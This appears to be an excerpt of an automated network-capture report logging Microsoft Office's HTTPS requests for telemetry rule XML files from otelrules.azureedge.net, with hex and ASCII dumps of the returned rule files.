                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          32192.168.2.44979513.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:18 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:18 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 450
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                          x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154318Z-174c587ffdfb485jhC1TEBmc1s00000005wg00000000qdz8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:18 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          33192.168.2.44979413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:18 UTC494INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 3788
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                          x-ms-request-id: 44ae66ae-301e-001f-7627-3caa3a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154318Z-15b8b599d88z9sc7hC1TEBkr4w00000006ag000000005chf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:18 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          34192.168.2.44979713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:18 UTC494INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2160
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                          x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154318Z-174c587ffdfgcs66hC1TEB69cs00000005z000000000hqy4
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:18 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          35192.168.2.44979813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:18 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 408
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                          x-ms-request-id: a3d07856-b01e-0084-3a7e-3bd736000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154318Z-174c587ffdfcb7qhhC1TEB3x7000000006a0000000000wke
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:18 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          36192.168.2.44979613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:18 UTC494INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2980
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                          x-ms-request-id: 8db92378-201e-003f-2cbf-3e6d94000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154318Z-178bfbc474bp8mkvhC1NYCzqnn00000007c000000000ut13
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:18 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          37192.168.2.44980113.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:20 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:21 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                          x-ms-request-id: c312cdef-801e-0083-52a3-3ef0ae000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154320Z-178bfbc474b7cbwqhC1NYC8z4n00000007hg00000000gthb
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          38192.168.2.44980013.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:20 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:21 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 474
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                          x-ms-request-id: 65361fd5-201e-0033-283f-3cb167000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154321Z-15b8b599d88l2dpthC1TEBmzr0000000064g000000007pch
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          39192.168.2.44980313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:20 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:21 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                          x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154321Z-15b8b599d88n8stkhC1TEBb78n000000010g00000000a25t
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
